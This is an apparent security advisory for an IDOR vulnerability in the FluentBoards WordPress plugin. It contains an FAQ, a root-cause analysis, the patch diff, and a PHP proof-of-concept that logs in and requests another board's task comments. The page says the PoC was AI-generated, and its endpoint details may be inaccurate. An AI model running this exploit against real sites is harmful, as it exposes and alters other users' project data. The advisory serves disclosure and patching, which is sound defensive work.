What is CVE-2026-40784?

CVE-2026-40784 is a security vulnerability in the FluentBoards plugin for WordPress, specifically an Insecure Direct Object Reference (IDOR). It allows authenticated users with Custom-level access or higher to perform unauthorized actions on resources belonging to other boards due to missing validation of the board_id parameter.

Who is affected by this vulnerability?

All users of the FluentBoards plugin version 1.91.2 and earlier are affected. This includes any WordPress installations where the plugin is active and users have board member access or higher.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the FluentBoards plugin installed. If it is version 1.91.2 or earlier, your site is at risk. Additionally, review user roles to determine if any users have Custom-level access or higher.

How can I fix this vulnerability?

To mitigate this vulnerability, update the FluentBoards plugin to version 1.91.3 or later, where the issue has been patched. Ensure that all users are informed to update their installations promptly.

What does the CVSS score of 4.3 mean?

The CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while authentication is required to exploit the vulnerability, the complexity of the attack is low, making it relatively easier for attackers with access to exploit it.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can allow attackers to view, modify, or delete tasks, comments, and other resources across different boards. This can lead to unauthorized access to sensitive project information, disruption of workflows, and potential data integrity issues.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an authenticated user can craft requests to access comments from tasks on different boards without proper validation of the board_id. By manipulating request parameters, an attacker can gain unauthorized access to resources that should be restricted.

What specific actions can an attacker perform?

An attacker can perform actions such as viewing comments on tasks from other boards, modifying task details, deleting comments or tasks, and revoking invitations for other users. This can severely disrupt project management activities and expose sensitive information.

What changes were made in the patched version?

In the patched version 1.91.3, validation checks for the board_id parameter were added to all vulnerable methods. This ensures that any resource access is restricted to the appropriate board, preventing unauthorized cross-board interactions.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the FluentBoards plugin until a patch can be applied. Additionally, review user roles and limit access to only those who need it to minimize potential exploitation risks.

Where can I find more information about this vulnerability?

More information about CVE-2026-40784 can be found in the official CVE database, security advisories from WordPress, and the plugin’s repository. Keeping an eye on security forums and updates from the plugin developers is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2026-40784: FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration <= 1.91.2 – Authenticated (Board Member+) Insecure Direct Object Reference (fluent-boards)

CVE ID CVE-2026-40784

Plugin fluent-boards

Severity Medium (CVSS 4.3)

CWE 639

Vulnerable Version 1.91.2

Patched Version 1.91.3

Disclosed April 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-40784:

This vulnerability is an Insecure Direct Object Reference (IDOR) in the FluentBoards plugin for WordPress, affecting versions up to and including 1.91.2. Authenticated attackers with Custom-level board access or higher can perform unauthorized actions on resources belonging to other boards, such as tasks, comments, stages, and invitations. The CVSS score is 4.3, indicating moderate severity due to the need for authentication but low complexity.

The root cause is missing validation of the board_id parameter in multiple controller and service methods. In the vulnerable code, functions like BoardController::archiveAllTasksInStage, CommentController::getComments, deleteComment, deleteReply, updateCommentPrivacy, and TaskController methods (e.g., updateTaskDate, deleteTask, moveTaskToNextStage, updateStage, getTaskComments, getTaskActivity, uploadFile, deleteCoverImage, cloneTask, updateTaskProperty) use findOrFail or find based solely on IDs (task_id, comment_id, stage_id) without verifying that the resource belongs to the specified board_id. For example, in TaskController lines 188-191 and 889-896, tasks are retrieved by task_id alone, allowing cross-board access. Similarly, StageService::archiveAllTasksInStage and BoardService::deleteInvitation lack cross-board checks. The file paths are: fluent-boards/app/Http/Controllers/BoardController.php (line 971), CommentController.php (lines 30-31, 111, 218, 270, 342), TaskController.php (lines 188, 242, 443, 492, 560, 572, 703, 718, 785, 828, 880, 898, 1142), and Services/StageService.php (lines 278-285, 328-337), Services/BoardService.php (lines 711-717).

Exploitation requires an authenticated user with board member access. The attacker can craft requests to endpoints like /wp-admin/admin-ajax.php with action parameters such as ‘fluent_boards/archive-all-tasks-in-stage’ and provide a stage_id from another board without the correct board_id, or call CommentController actions with a comment_id belonging to a different board. For instance, an attacker can send a POST to /wp-admin/admin-ajax.php?action=fluent_boards_get_comments with a target task_id that exists in another board, and the plugin will return comments from that unauthorized task. Specific parameters to modify include task_id, stage_id, comment_id, or invitation_id in the request body or URL, while omitting or falsifying the associated board_id. The attacker can enumerate resource IDs to access or modify entities they should not have permission to view or change.

The patch adds board_id validation to all vulnerable methods. For example, in CommentController::getComments (lines 30-31), the patch replaces Comment::findOrFail($task_id) with Task::where(‘board_id’, $board_id)->where(‘id’, $task_id)->firstOrFail(), ensuring the task belongs to the provided board. Similarly, TaskController methods now use Task::where(‘board_id’, $board_id)->where(‘id’, $task_id)->firstOrFail() instead of Task::find($task_id) or Task::findOrFail($task_id). StageService::archiveAllTasksInStage now receives the board_id parameter and filters by it (lines 328-337). BoardService::deleteInvitation optionally filters by board_id. These changes enforce that the resource ID must correspond to the expected board, preventing cross-board access.

Exploitation allows an attacker to view, modify, or delete tasks, comments, stages, and board invitations across different boards within the same WordPress installation. This can lead to unauthorized data exposure, modification of tasks (e.g., due dates, assignments), archival or deletion of tasks, deletion of comments or replies, and revocation of other board members’ invitations. The impact is limited to board-level resources but can disrupt project management workflows, expose sensitive project information, and cause data integrity issues.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/fluent-boards/app/Http/Controllers/BoardController.php
+++ b/fluent-boards/app/Http/Controllers/BoardController.php
@@ -968,7 +968,7 @@

     public function archiveAllTasksInStage($board_id, $stage_id)
     {
-        $updates = $this->stageService->archiveAllTasksInStage($stage_id);
+        $updates = $this->stageService->archiveAllTasksInStage($stage_id, $board_id);
         return [
             'message'      => __('Tasks have been archived', 'fluent-boards'),
             'updatedTasks' => $updates,
--- a/fluent-boards/app/Http/Controllers/CommentController.php
+++ b/fluent-boards/app/Http/Controllers/CommentController.php
@@ -27,7 +27,10 @@

     public function getComments(Request $request, $board_id, $task_id)
     {
+        $board_id = absint($board_id);
+        $task_id = absint($task_id);
         try {
+            Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
             $filter = $request->getSafe('filter', 'sanitize_text_field');
             $per_page =  10;

@@ -105,7 +108,7 @@

             $usersToSendEmail = [];
             if ($comment->type == 'reply') {
-                $parentComment = Comment::findOrFail($comment->parent_id);
+                $parentComment = Comment::where('board_id', (int) $board_id)->where('id', $comment->parent_id)->firstOrFail();
                 $commenterId = $parentComment->created_by;
                 if ($commenterId != get_current_user_id())
                 {
@@ -212,7 +215,10 @@

     public function deleteComment($board_id, $comment_id)
     {
+        $board_id = absint($board_id);
+        $comment_id = absint($comment_id);
         try {
+            Comment::where('board_id', $board_id)->where('id', $comment_id)->firstOrFail();
             $this->commentService->delete($comment_id);

             return $this->sendSuccess([
@@ -261,7 +267,10 @@

     public function deleteReply($board_id, $reply_id)
     {
+        $board_id = absint($board_id);
+        $reply_id = absint($reply_id);
         try {
+            Comment::where('board_id', $board_id)->where('id', $reply_id)->firstOrFail();
             $this->commentService->deleteReply($reply_id);

             return $this->sendSuccess([
@@ -330,7 +339,9 @@

     public function updateCommentPrivacy($board_id, $comment_id)
     {
-        $comment = Comment::findOrFail($comment_id);
+        $board_id = absint($board_id);
+        $comment_id = absint($comment_id);
+        $comment = Comment::where('board_id', $board_id)->where('id', $comment_id)->firstOrFail();

         // Check if user has permission to update the comment
         if ($comment->created_by != get_current_user_id()) {
--- a/fluent-boards/app/Http/Controllers/TaskController.php
+++ b/fluent-boards/app/Http/Controllers/TaskController.php
@@ -185,10 +185,10 @@

             $stageService = new StageService();

-            $task = Task::findOrFail($task_id);
+            $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();

-            if (isset($task->parent_id)) {
-                $task = Task::findOrFail($task->parent_id);
+            if ($task->parent_id) {
+                $task = Task::where('board_id', $board_id)->where('id', $task->parent_id)->firstOrFail();
             }

             if(!$task) {
@@ -239,6 +239,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         $filter = $request->getSafe('filter', 'sanitize_text_field');
         $per_page = 15; // Apparently, let's use a fixed number of items per page.

@@ -439,7 +440,7 @@
         }

         $validatedData = $this->updateTaskPropValidationAndSanitation($col, $value);
-        $task = Task::with(['board', 'labels', 'assignees'])->findOrFail($task_id);
+        $task = Task::with(['board', 'labels', 'assignees'])->where('board_id', $board_id)->where('id', $task_id)->firstOrFail();

         $oldDateValue = null;
         if (in_array($col, ['due_at', 'started_at'])) {
@@ -488,7 +489,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
-        $task = Task::findOrFail($task_id);
+        $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();

         // Capture old dates before updating
         $oldDates = [
@@ -556,6 +557,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         $integrationType = $request->getSafe('integrationType', 'sanitize_text_field');
         return [
             'message' => __('Task status has been updated', 'fluent-boards'),
@@ -567,7 +569,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
-        $task = Task::findOrFail($task_id);
+        $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         $options = null;
         //if we need to do something before a task is deleted
         do_action('fluent_boards/before_task_deleted', $task, $options);
@@ -698,6 +700,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         $task = $this->taskService->moveTaskToNextStage($task_id);

         return [
@@ -712,7 +715,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
-        $task = Task::findOrFail($task_id);
+        $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         $oldStageId = $task->stage_id;
         $newStageId = $request->getSafe('newStageId', 'intval');
         $newIndex = $request->getSafe('newIndex', 'intval');
@@ -779,6 +782,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         try {
             // Pagination parameters
             $page = $request->getSafe('page', 'intval', 1);
@@ -821,6 +825,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         try {


@@ -872,6 +877,7 @@
     {
         $board_id = absint($board_id);
         $task_id = absint($task_id);
+        Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
         try {

             $file = Arr::get($request->files(), 'file')->toArray();
@@ -889,7 +895,7 @@
                 $fileUploadedData->save();
             }

-            $task = Task::find($task_id);
+            $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
             $settings = $task->settings;
             $this->taskService->deleteTaskCoverImage($settings);
             $publicUrl = (new CommentService())->createPublicUrl($fileUploadedData, $board_id);
@@ -916,7 +922,7 @@
         $board_id = absint($board_id);
         $task_id = absint($task_id);
         try {
-            $task = Task::find($task_id);
+            $task = Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
             $settings = $task->settings;
             $this->taskService->deleteTaskCoverImage($settings);
             unset($settings['cover']);
@@ -1133,6 +1139,7 @@
             'comment'        => 'required',
         ]);
         try {
+            Task::where('board_id', $board_id)->where('id', $task_id)->firstOrFail();
             $taskData = fluent_boards_string_to_bool($taskData);
             $clonedTask = $this->taskService->cloneTask($task_id, $taskData);

--- a/fluent-boards/app/Services/BoardService.php
+++ b/fluent-boards/app/Services/BoardService.php
@@ -708,9 +708,14 @@
             ->get();
     }

-    public function deleteInvitation($invitationId)
+    public function deleteInvitation($invitationId, $boardId = null)
     {
-        Meta::findOrFail($invitationId)->delete();
+        $query = Meta::query();
+        if ($boardId) {
+            $query->where('object_id', $boardId)
+                  ->where('object_type', Constant::OBJECT_TYPE_BOARD);
+        }
+        $query->findOrFail($invitationId)->delete();
     }

     public function hasDataChanged($boardId)
--- a/fluent-boards/app/Services/StageService.php
+++ b/fluent-boards/app/Services/StageService.php
@@ -275,9 +275,13 @@
         $board->save();
     }

-    public function updateStageTemplate($stage_id)
+    public function updateStageTemplate($stage_id, $boardId = null)
     {
-        $stage = Stage::findOrFail($stage_id);
+        $query = Stage::query();
+        if ($boardId) {
+            $query->where('board_id', $boardId);
+        }
+        $stage = $query->findOrFail($stage_id);
         $stageSettings = $stage->settings;
         if($stageSettings && array_key_exists('is_template', $stageSettings))
         {
@@ -321,9 +325,13 @@
         }
         return $tasks;
     }
-    public function archiveAllTasksInStage($stage_id)
+    public function archiveAllTasksInStage($stage_id, $boardId = null)
     {
-        $tasks = Task::where('stage_id', $stage_id)->whereNull('parent_id')->whereNull('archived_at')->get();
+        $query = Task::where('stage_id', $stage_id)->whereNull('parent_id')->whereNull('archived_at');
+        if ($boardId) {
+            $query->where('board_id', $boardId);
+        }
+        $tasks = $query->get();
         foreach ($tasks as $task) {
             $task->position = 0;
             $task->archived_at = current_time('mysql');
--- a/fluent-boards/fluent-boards.php
+++ b/fluent-boards/fluent-boards.php
@@ -5,7 +5,7 @@
 /*
 Plugin Name: Fluent Boards - Project Management Tool
 Description: Fluent Boards is a powerful tool designed for efficient management of to-do lists, projects, and tasks with kanban board and more..
-Version: 1.91.2
+Version: 1.91.3
 Author: WPManageNinja
 Author URI: https://fluentboards.com
 Plugin URI: https://fluentboards.com
@@ -20,7 +20,7 @@
 }

 define('FLUENT_BOARDS', 'fluent-boards');
-define('FLUENT_BOARDS_PLUGIN_VERSION', '1.91.2');
+define('FLUENT_BOARDS_PLUGIN_VERSION', '1.91.3');
 define('FLUENT_BOARDS_PLUGIN_PATH', plugin_dir_path(__FILE__));
 define('FLUENT_BOARDS_DIR_FILE', __FILE__);
 define('FLUENT_BOARDS_PLUGIN_URL', plugin_dir_url(__FILE__));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-40784 - FluentBoards IDOR

/*
 * This script demonstrates fetching comments from a task in a different board
 * without proper board_id validation. The attacker needs a valid nonce and
 * WordPress admin AJAX URL, but can access tasks across boards.
 */

$target_url = 'http://target-wordpress-site.com/wp-admin/admin-ajax.php';
$username = 'attacker';
$password = 'attackerpassword';

// Step 1: Authenticate and get cookies
$login_url = 'http://target-wordpress-site.com/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: Get a valid nonce for FluentBoards actions (example: fetch comments)
// Assume we already have a valid action name. In real exploit, attacker would sniff or guess nonce.
$nonce = 'placeholder_nonce'; // Replace with actual nonce extraction from page source

// Step 3: Target a task_id from a different board (e.g., board_id=2, task_id=50)
// The attacker calls getComments endpoint without proper board_id check
$task_id = 50; // A task that exists but belongs to board_id=2 (victim's board)
$board_id = 1; // Attacker's board ID, but code ignores it

$post_data = [
    'action' => 'fluent_boards_get_comments',
    'board_id' => $board_id,
    'task_id' => $task_id,
    'nonce' => $nonce
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// Check if we got data
if ($response) {
    $decoded = json_decode($response, true);
    if (isset($decoded['comments'])) {
        echo "[+] Exploit successful! Retrieved comments from task ID $task_id (from board 2):n";
        print_r($decoded['comments']);
    } else {
        echo "[-] No comments returned. Task may not exist or requires correct board_id (vulnerability not exploitable).n";
    }
} else {
    echo "[-] Request failed.n";
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-40784?
Understanding the vulnerability
CVE-2026-40784 is a security vulnerability in the FluentBoards plugin for WordPress, specifically an Insecure Direct Object Reference (IDOR). It allows authenticated users with Custom-level access or higher to perform unauthorized actions on resources belonging to other boards due to missing validation of the board_id parameter.
Who is affected by this vulnerability?
Identifying impacted users
All users of the FluentBoards plugin version 1.91.2 and earlier are affected. This includes any WordPress installations where the plugin is active and users have board member access or higher.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the FluentBoards plugin installed. If it is version 1.91.2 or earlier, your site is at risk. Additionally, review user roles to determine if any users have Custom-level access or higher.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the FluentBoards plugin to version 1.91.3 or later, where the issue has been patched. Ensure that all users are informed to update their installations promptly.
What does the CVSS score of 4.3 mean?
Understanding severity ratings
The CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while authentication is required to exploit the vulnerability, the complexity of the attack is low, making it relatively easier for attackers with access to exploit it.
What are the practical risks associated with this vulnerability?
Potential impact on data
Exploitation of this vulnerability can allow attackers to view, modify, or delete tasks, comments, and other resources across different boards. This can lead to unauthorized access to sensitive project information, disruption of workflows, and potential data integrity issues.
How does the proof of concept demonstrate the issue?
Explaining the exploitation method
The proof of concept shows how an authenticated user can craft requests to access comments from tasks on different boards without proper validation of the board_id. By manipulating request parameters, an attacker can gain unauthorized access to resources that should be restricted.
What specific actions can an attacker perform?
Understanding the attack capabilities
An attacker can perform actions such as viewing comments on tasks from other boards, modifying task details, deleting comments or tasks, and revoking invitations for other users. This can severely disrupt project management activities and expose sensitive information.
What changes were made in the patched version?
Details of the fix
In the patched version 1.91.3, validation checks for the board_id parameter were added to all vulnerable methods. This ensures that any resource access is restricted to the appropriate board, preventing unauthorized cross-board interactions.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling the FluentBoards plugin until a patch can be applied. Additionally, review user roles and limit access to only those who need it to minimize potential exploitation risks.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-40784 can be found in the official CVE database, security advisories from WordPress, and the plugin’s repository. Keeping an eye on security forums and updates from the plugin developers is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations